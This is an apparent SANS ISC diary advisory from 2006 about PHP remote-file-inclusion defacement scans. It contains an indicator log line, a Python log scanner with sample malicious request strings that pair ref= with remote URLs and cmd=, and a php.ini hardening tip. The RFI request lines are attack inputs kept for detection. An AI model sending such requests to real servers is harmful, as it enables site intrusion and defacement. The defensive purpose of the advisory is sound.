
SANS ISC: Probable php shell/web defacement tool usage on the rise

Probable php shell/web defacement tool usage on the rise
The ISC handler mailbox has received multiple reports of web site defacement attempts apparently using the "Defacing Tool 2.0 by r3v3ng4ns" suite of php based scripts, which is intended to deface websites by leveraging PHP remote file inclusion.  Multiple reports in a short period of time seem to indicate aggressive scanning activity leveraging this tool suite.  This particular attacker/tool combination has search engine hits going back to early December 2005, so the tool has been around for at the very least a short period of time.  The initially reported site hosting these php scripts has already removed the offending tools, but script hosting will always remain a moving target.

If you are running PHP enabled web servers, take a peek at your recent http logs for any hits similar to the following.  The common thread will be 'ref=' and 'cmd=' appearing on the same http log entry.  It looks fairly trivial to create a snort signature to identify this scanning/abuse, considering that this is an edge case that the bleedingsnort rules do not yet alert on.  We'll probably post a usable snort signature later today.

GET /?ref=http://www.[removed]/[MultipleTargetFiles].dot?&cmd=
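The log check described above, written out as a small scanner.  This is an added example, not code from the ISC diary: it parses Apache/nginx combined-format access log lines, flags any request whose query string carries both a `ref=` and a `cmd=` parameter, and notes whether the `ref=` value points at a remote URL (the remote file inclusion pattern).  The log lines in `SAMPLE_LOG` are constructed for the example; the client addresses and hostnames are documentation values, not real indicators.

```python
"""Flag access log entries carrying both ref= and cmd= in one request.

Added example; not part of the ISC diary.  Sample log lines below are
constructed for illustration.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Combined log format: client ident user [time] "METHOD target PROTO" status bytes ...
_REQ_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

_REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def query_params(target):
    """Return the query parameters of a request target as a dict of lists.

    keep_blank_values matters: the scans seen in the wild send an empty
    'cmd=' and we still want to see it.
    """
    return parse_qs(urlsplit(target).query, keep_blank_values=True)


def suspicious_query(target):
    """True when both ref= and cmd= are present in the same request."""
    qs = query_params(target)
    return "ref" in qs and "cmd" in qs


def ref_is_remote(target):
    """True when any ref= value is a URL on another host (RFI pattern)."""
    return any(v.lower().startswith(_REMOTE_SCHEMES)
               for v in query_params(target).get("ref", []))


def scan_log(lines):
    """Scan log lines and return one hit record per suspicious request.

    Unparseable lines are skipped rather than raising, since real logs
    contain the odd truncated or malformed entry.
    """
    hits = []
    for line in lines:
        m = _REQ_RE.match(line)
        if not m or not suspicious_query(m["target"]):
            continue
        hits.append({
            "client": m["client"],
            "time": m["time"],
            "target": m["target"],
            "status": int(m["status"]),
            "remote_ref": ref_is_remote(m["target"]),
        })
    return hits


# Constructed sample log (documentation addresses and hostnames only).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Jan/2006:10:15:01 +0000] '
    '"GET /?ref=http://www.example.invalid/tool.dot?&cmd= HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '192.0.2.11 - - [09/Jan/2006:10:15:03 +0000] '
    '"GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [09/Jan/2006:10:15:07 +0000] '
    '"GET /blog/?ref=newsletter HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '192.0.2.13 - - [09/Jan/2006:10:15:09 +0000] '
    '"GET /cgi/?cmd= HTTP/1.0" 404 200 "-" "curl/7.15"',
    '192.0.2.14 - - [09/Jan/2006:10:15:12 +0000] '
    '"GET /?ref=http://203.0.113.5/x.dot?&cmd= HTTP/1.1" 404 220 "-" "Mozilla/4.0"',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("{client} {time} status={status} remote_ref={remote_ref} {target}".format(**hit))
```

Feed it a real access log with `scan_log(open("access.log"))`.  A hit with `remote_ref` True is the case worth reporting; a 404 status only means that particular path was not present, not that the host was left alone, since the tool tries multiple target files.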

If you find unique hits on this abuse, feel free to report them back to us and we will make notification to the script hosting provider.

If you manage a web host that you are certain does not require the use of remote includes, you can disable that functionality in your php.ini configuration file by modifying the following variable.

allow_url_fopen = Off


39 Posts
Jan 9th 2006
